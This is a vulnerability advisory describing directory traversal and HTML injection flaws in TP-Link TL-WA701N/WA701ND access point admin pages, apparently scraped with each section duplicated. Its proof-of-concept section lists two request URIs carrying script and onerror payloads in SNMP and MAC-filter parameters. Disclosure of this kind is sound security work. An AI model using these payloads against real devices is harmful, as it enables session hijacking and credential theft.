TP-Link TL-WA701N and TL-WA701ND Directory Traversal and HTML Injection Vulnerabilities
BID:57969
Info
TP-Link TL-WA701N and TL-WA701ND Directory Traversal and HTML Injection Vulnerabilities
| Bugtraq ID: | 57969 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 15 2013 12:00AM |
| Updated: | Feb 15 2013 12:00AM |
| Credit: | Michael Messner |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
TP-Link TL-WA701N and TL-WA701ND Directory Traversal and HTML Injection Vulnerabilities
TL-WA701N and TL-WA701ND are prone to a directory traversal vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to gain unauthorized access to local files and execute arbitrary HTML and script code in the context of the affected browser. This may let the attacker steal cookie-based authentication credentials or control how the site is rendered to the user.
TL-WA701N and TL-WA701ND are prone to a directory traversal vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to gain unauthorized access to local files and execute arbitrary HTML and script code in the context of the affected browser. This may let the attacker steal cookie-based authentication credentials or control how the site is rendered to the user.
Exploit / POC
TP-Link TL-WA701N and TL-WA701ND Directory Traversal and HTML Injection Vulnerabilities
Attackers can exploit these issues with a browser.
The following example URIs are available:
http://www.example.com/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name=</script>&sys_location=<script>alert('XSSed')</script>&get_community=111&get_source=123&set_community=123&set_source=111&Save=Save
http://www.example.com/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save
Attackers can exploit these issues with a browser.
The following example URIs are available:
http://www.example.com/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name=</script>&sys_location=<script>alert('XSSed')</script>&get_community=111&get_source=123&set_community=123&set_source=111&Save=Save
http://www.example.com/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save
Solution / Fix
TP-Link TL-WA701N and TL-WA701ND Directory Traversal and HTML Injection Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
TP-Link TL-WA701N and TL-WA701ND Directory Traversal and HTML Injection Vulnerabilities
References:
References:
- Multiple Vulnerabilities in TP-Link TL-WA701N / TL-WA701ND (Michael Messner)
- TP-LINK Homepage (TP-LINK)